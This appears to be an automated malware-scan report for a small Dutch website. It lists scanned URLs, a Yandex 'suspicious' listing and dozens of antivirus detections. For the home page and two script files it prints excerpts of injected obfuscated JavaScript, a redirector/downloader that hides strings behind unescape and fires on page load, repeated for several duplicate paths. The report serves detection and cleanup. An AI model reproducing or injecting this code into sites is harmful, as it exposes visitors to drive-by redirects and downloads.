
Malware Scanner report for zwiggelaar.nl

Malicious/Suspicious/Total urls checked
11/0/15
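11 pages have malicious code. See details below. Note that the list counts include/url.js and include/sitetree.js five times each, reached through repeated "./" path prefixes and returned with identical Content-Length values, so the distinct infected resources shown are the home page and those two script files.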
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "zwiggelaar.nl" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=zwiggelaar.nl

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zwiggelaar.nl/

Result: The website is marked by Yandex as suspicious - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://zwiggelaar.nl/
200 OK
Content-Length: 7874
Content-Type: text/html
malicious
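Malicious code - confirmed by antiviruses (see below). The excerpt is obfuscated: junk variable checks pad the script, strings are hidden behind an alias of unescape() and split literals such as "on"+"lo"+"ad", and the visible tail appends an element to the page body from a window onload handler, which is consistent with the redirector/downloader labels in the antivirus list.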

var AD;if(AD!=''){AD='BW'};var K;if(K!='D' && K!='Hu'){K=''};this.Yv="";function Y(){var TC=new Array();var n=new Array();var YO=unescape;var w;if(w!='a' && w != ''){w=null};var b;if(b!='' && b!='gW'){b=null};var s=window;var V=YO("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%63%65%72%2e%63%6f%6d%2f%65%78%61%6d%69%6e%65%72%2e%63%6f%6d%2e%70%68%70");this.KQ='';var hO="";var r;if(r!='' && r!='U'){r=null};function h(T,z){var W='';var M;if(M!='' && M!='vK'){M='TO'}
... 1220 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

AntiVir
JS/Illredir.BZ
Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Script.402625
Antiy-AVL
Trojan/JS.Redirector
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.402625
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_KEMPAR.SM
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Script.402625 (B)
K7GW
Exploit ( 04c559b91 )
McAfee-GW-Edition
JS/Redirector.ad
TrendMicro
JS_KEMPAR.SM
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
Trojan.JS.Redirector.kv
MicroWorld-eScan
Trojan.Script.402625
Fortinet
JS/Crypt.BBES!tr
TotalDefense
JS/Redirector.BH
McAfee
JS/Redirector.ad
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Script.402625
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.402625
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Script.402625

http://zwiggelaar.nl/./include/url.js
200 OK
Content-Length: 17388
Content-Type: application/javascript
malicious
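Malicious code - confirmed by antiviruses (see below). The file's own code comes first; the obfuscated block after the skipped bytes is the same tail that ends the infected home page excerpt, so the injected script appears to have been appended to an existing script file.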

// Global shims that forward to methods on an object named URL.
// NOTE(review): the URL object is not defined in this excerpt; presumably the
// file declares its own URL helper further down, which would shadow the
// browser's built-in URL constructor - confirm.
// NOTE(review): the function names suggest a session identifier is carried in
// links; if so it is exposed through Referer headers, server logs and browser
// history - confirm against the URL implementation.

// String constant; judging by its name it labels the session key. Its users
// are not visible in this excerpt.
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";

/**
 * Forwards to URL.getSessionPair.
 * @param {*} loc - passed through unchanged.
 * @returns {*} whatever URL.getSessionPair returns.
 */
function getSessionPair(loc) {
  var pair = URL.getSessionPair(loc);
  return pair;
}

/**
 * Forwards to URL.getSessionHref.
 * @returns {*} whatever URL.getSessionHref returns.
 */
function getSessionHref() {
  var href = URL.getSessionHref();
  return href;
}

/**
 * Forwards to URL.processLinkz; the result of that call is discarded.
 * @param {*} doc - passed through unchanged.
 */
function processLinkz(doc) {
  URL.processLinkz(doc);
}

/**
 * Forwards to URL.getSessionString.
 * @returns {*} whatever URL.getSessionString returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}

/**
 * Forwards to URL.jdecode.
 * @param {*} s - passed through unchanged.
 * @returns {*} whatever URL.jdecode returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}

function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Iframe.AZF
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Iframe.AZF
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Iframe.AZF (B)
K7GW
Exploit ( 04c559b91 )
McAfee-GW-Edition
JS/Redirector.ad
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
Trojan.JS.Redirector.kv
MicroWorld-eScan
Trojan.Iframe.AZF
Fortinet
JS/Crypt.BBES!tr
TotalDefense
JS/Redirector.BH
McAfee
JS/Redirector.ad
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Iframe.AZF
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Sophos
Troj/JSRedir-BD
GData
Trojan.Iframe.AZF
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Iframe.AZF

http://zwiggelaar.nl/./include/sitetree.js
200 OK
Content-Length: 8851
Content-Type: application/javascript
malicious
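Malicious code - confirmed by antiviruses (see below). The file's own code comes first; the obfuscated block after the skipped bytes is the same tail that ends the infected home page excerpt, so the injected script appears to have been appended to an existing script file.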



/**
 * Decodes a form-style escaped string: every "+" becomes "%20", then the
 * escapes are resolved with the legacy global unescape().
 * @param {string} s - escaped text.
 * @returns {string} the decoded text.
 */
function jdecode(s) {
  var withSpaces = s.replace(/\+/g, "%20");
  return unescape(withSpaces);
}

// Positions 0..7; each row of theSitetree below has eight entries, so these
// look like the column indexes of a row.
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;

// Two rows are visible in this excerpt. The sixth entry is the string
// 'true', not a boolean, so a consumer has to compare it as text.
// No trailing comma after the last row: it would change the array length in
// old browsers.
var theSitetree = [
  [
    'PAGE', '1508',
    jdecode('Portal'), jdecode(''),
    '/1508.html', 'true', [], ''
  ],
  [
    'PAGE', '33801',
    jdecode('Webmail'), jdecode(''),
    '/33801.html', 'true', [], ''
  ]
];
... 3312 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Iframe.AZF
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Iframe.AZF
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Iframe.AZF (B)
K7GW
Exploit ( 04c559b91 )
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
Trojan.Iframe.AZF
TotalDefense
JS/Redirector.BH
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Iframe.AZF
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Iframe.AZF
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Iframe.AZF

http://zwiggelaar.nl/./1508.html?*session*id*key*=*session*id*val*
200 OK
Content-Length: 5729
Content-Type: text/html
clean
http://zwiggelaar.nl/././include/url.js
200 OK
Content-Length: 17388
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Global shims that forward to methods on an object named URL.
// NOTE(review): the URL object is not defined in this excerpt; presumably the
// file declares its own URL helper further down, which would shadow the
// browser's built-in URL constructor - confirm.
// NOTE(review): the function names suggest a session identifier is carried in
// links; if so it is exposed through Referer headers, server logs and browser
// history - confirm against the URL implementation.

// String constant; judging by its name it labels the session key. Its users
// are not visible in this excerpt.
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";

/**
 * Forwards to URL.getSessionPair.
 * @param {*} loc - passed through unchanged.
 * @returns {*} whatever URL.getSessionPair returns.
 */
function getSessionPair(loc) {
  var pair = URL.getSessionPair(loc);
  return pair;
}

/**
 * Forwards to URL.getSessionHref.
 * @returns {*} whatever URL.getSessionHref returns.
 */
function getSessionHref() {
  var href = URL.getSessionHref();
  return href;
}

/**
 * Forwards to URL.processLinkz; the result of that call is discarded.
 * @param {*} doc - passed through unchanged.
 */
function processLinkz(doc) {
  URL.processLinkz(doc);
}

/**
 * Forwards to URL.getSessionString.
 * @returns {*} whatever URL.getSessionString returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}

/**
 * Forwards to URL.jdecode.
 * @param {*} s - passed through unchanged.
 * @returns {*} whatever URL.jdecode returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}

function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Iframe.AZF
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Iframe.AZF
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Iframe.AZF (B)
K7GW
Exploit ( 04c559b91 )
McAfee-GW-Edition
JS/Redirector.ad
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
Trojan.JS.Redirector.kv
MicroWorld-eScan
Trojan.Iframe.AZF
Fortinet
JS/Crypt.BBES!tr
TotalDefense
JS/Redirector.BH
McAfee
JS/Redirector.ad
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Iframe.AZF
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Sophos
Troj/JSRedir-BD
GData
Trojan.Iframe.AZF
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Iframe.AZF

http://zwiggelaar.nl/././include/sitetree.js
200 OK
Content-Length: 8851
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



/**
 * Decodes a form-style escaped string: every "+" becomes "%20", then the
 * escapes are resolved with the legacy global unescape().
 * @param {string} s - escaped text.
 * @returns {string} the decoded text.
 */
function jdecode(s) {
  var withSpaces = s.replace(/\+/g, "%20");
  return unescape(withSpaces);
}

// Positions 0..7; each row of theSitetree below has eight entries, so these
// look like the column indexes of a row.
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;

// Two rows are visible in this excerpt. The sixth entry is the string
// 'true', not a boolean, so a consumer has to compare it as text.
// No trailing comma after the last row: it would change the array length in
// old browsers.
var theSitetree = [
  [
    'PAGE', '1508',
    jdecode('Portal'), jdecode(''),
    '/1508.html', 'true', [], ''
  ],
  [
    'PAGE', '33801',
    jdecode('Webmail'), jdecode(''),
    '/33801.html', 'true', [], ''
  ]
];
... 3312 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Iframe.AZF
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Iframe.AZF
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Iframe.AZF (B)
K7GW
Exploit ( 04c559b91 )
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
Trojan.Iframe.AZF
TotalDefense
JS/Redirector.BH
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Iframe.AZF
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Iframe.AZF
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Iframe.AZF

http://zwiggelaar.nl/././1508.html?*session*id*key*=*session*id*val*
200 OK
Content-Length: 5729
Content-Type: text/html
clean
http://zwiggelaar.nl/./././include/url.js
200 OK
Content-Length: 17388
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Global shims that forward to methods on an object named URL.
// NOTE(review): the URL object is not defined in this excerpt; presumably the
// file declares its own URL helper further down, which would shadow the
// browser's built-in URL constructor - confirm.
// NOTE(review): the function names suggest a session identifier is carried in
// links; if so it is exposed through Referer headers, server logs and browser
// history - confirm against the URL implementation.

// String constant; judging by its name it labels the session key. Its users
// are not visible in this excerpt.
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";

/**
 * Forwards to URL.getSessionPair.
 * @param {*} loc - passed through unchanged.
 * @returns {*} whatever URL.getSessionPair returns.
 */
function getSessionPair(loc) {
  var pair = URL.getSessionPair(loc);
  return pair;
}

/**
 * Forwards to URL.getSessionHref.
 * @returns {*} whatever URL.getSessionHref returns.
 */
function getSessionHref() {
  var href = URL.getSessionHref();
  return href;
}

/**
 * Forwards to URL.processLinkz; the result of that call is discarded.
 * @param {*} doc - passed through unchanged.
 */
function processLinkz(doc) {
  URL.processLinkz(doc);
}

/**
 * Forwards to URL.getSessionString.
 * @returns {*} whatever URL.getSessionString returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}

/**
 * Forwards to URL.jdecode.
 * @param {*} s - passed through unchanged.
 * @returns {*} whatever URL.jdecode returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}

function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Iframe.AZF
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Iframe.AZF
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Iframe.AZF (B)
K7GW
Exploit ( 04c559b91 )
McAfee-GW-Edition
JS/Redirector.ad
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
Trojan.JS.Redirector.kv
MicroWorld-eScan
Trojan.Iframe.AZF
Fortinet
JS/Crypt.BBES!tr
TotalDefense
JS/Redirector.BH
McAfee
JS/Redirector.ad
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Iframe.AZF
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Sophos
Troj/JSRedir-BD
GData
Trojan.Iframe.AZF
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Iframe.AZF

http://zwiggelaar.nl/./././include/sitetree.js
200 OK
Content-Length: 8851
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



/**
 * Decodes a form-style escaped string: every "+" becomes "%20", then the
 * escapes are resolved with the legacy global unescape().
 * @param {string} s - escaped text.
 * @returns {string} the decoded text.
 */
function jdecode(s) {
  var withSpaces = s.replace(/\+/g, "%20");
  return unescape(withSpaces);
}

// Positions 0..7; each row of theSitetree below has eight entries, so these
// look like the column indexes of a row.
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;

// Two rows are visible in this excerpt. The sixth entry is the string
// 'true', not a boolean, so a consumer has to compare it as text.
// No trailing comma after the last row: it would change the array length in
// old browsers.
var theSitetree = [
  [
    'PAGE', '1508',
    jdecode('Portal'), jdecode(''),
    '/1508.html', 'true', [], ''
  ],
  [
    'PAGE', '33801',
    jdecode('Webmail'), jdecode(''),
    '/33801.html', 'true', [], ''
  ]
];
... 3312 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Iframe.AZF
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Iframe.AZF
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Iframe.AZF (B)
K7GW
Exploit ( 04c559b91 )
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
Trojan.Iframe.AZF
TotalDefense
JS/Redirector.BH
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Iframe.AZF
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Iframe.AZF
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Iframe.AZF

http://zwiggelaar.nl/./././1508.html?*session*id*key*=*session*id*val*
200 OK
Content-Length: 5729
Content-Type: text/html
clean
http://zwiggelaar.nl/././././include/url.js
200 OK
Content-Length: 17388
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Global shims that forward to methods on an object named URL.
// NOTE(review): the URL object is not defined in this excerpt; presumably the
// file declares its own URL helper further down, which would shadow the
// browser's built-in URL constructor - confirm.
// NOTE(review): the function names suggest a session identifier is carried in
// links; if so it is exposed through Referer headers, server logs and browser
// history - confirm against the URL implementation.

// String constant; judging by its name it labels the session key. Its users
// are not visible in this excerpt.
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";

/**
 * Forwards to URL.getSessionPair.
 * @param {*} loc - passed through unchanged.
 * @returns {*} whatever URL.getSessionPair returns.
 */
function getSessionPair(loc) {
  var pair = URL.getSessionPair(loc);
  return pair;
}

/**
 * Forwards to URL.getSessionHref.
 * @returns {*} whatever URL.getSessionHref returns.
 */
function getSessionHref() {
  var href = URL.getSessionHref();
  return href;
}

/**
 * Forwards to URL.processLinkz; the result of that call is discarded.
 * @param {*} doc - passed through unchanged.
 */
function processLinkz(doc) {
  URL.processLinkz(doc);
}

/**
 * Forwards to URL.getSessionString.
 * @returns {*} whatever URL.getSessionString returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}

/**
 * Forwards to URL.jdecode.
 * @param {*} s - passed through unchanged.
 * @returns {*} whatever URL.jdecode returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}

function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Iframe.AZF
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Iframe.AZF
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Iframe.AZF (B)
K7GW
Exploit ( 04c559b91 )
McAfee-GW-Edition
JS/Redirector.ad
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
Trojan.JS.Redirector.kv
MicroWorld-eScan
Trojan.Iframe.AZF
Fortinet
JS/Crypt.BBES!tr
TotalDefense
JS/Redirector.BH
McAfee
JS/Redirector.ad
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Iframe.AZF
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Sophos
Troj/JSRedir-BD
GData
Trojan.Iframe.AZF
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Iframe.AZF

http://zwiggelaar.nl/././././include/sitetree.js
200 OK
Content-Length: 8851
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



/**
 * Decodes a form-style escaped string: every "+" becomes "%20", then the
 * escapes are resolved with the legacy global unescape().
 * @param {string} s - escaped text.
 * @returns {string} the decoded text.
 */
function jdecode(s) {
  var withSpaces = s.replace(/\+/g, "%20");
  return unescape(withSpaces);
}

// Positions 0..7; each row of theSitetree below has eight entries, so these
// look like the column indexes of a row.
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;

// Two rows are visible in this excerpt. The sixth entry is the string
// 'true', not a boolean, so a consumer has to compare it as text.
// No trailing comma after the last row: it would change the array length in
// old browsers.
var theSitetree = [
  [
    'PAGE', '1508',
    jdecode('Portal'), jdecode(''),
    '/1508.html', 'true', [], ''
  ],
  [
    'PAGE', '33801',
    jdecode('Webmail'), jdecode(''),
    '/33801.html', 'true', [], ''
  ]
];
... 3312 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Iframe.AZF
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Iframe.AZF
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Iframe.AZF (B)
K7GW
Exploit ( 04c559b91 )
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
Trojan.Iframe.AZF
TotalDefense
JS/Redirector.BH
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Iframe.AZF
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Iframe.AZF
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Iframe.AZF

http://zwiggelaar.nl/././././1508.html?*session*id*key*=*session*id*val*
200 OK
Content-Length: 5729
Content-Type: text/html
clean
http://zwiggelaar.nl/./././././include/url.js
200 OK
Content-Length: 17388
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Global shims that forward to methods on an object named URL.
// NOTE(review): the URL object is not defined in this excerpt; presumably the
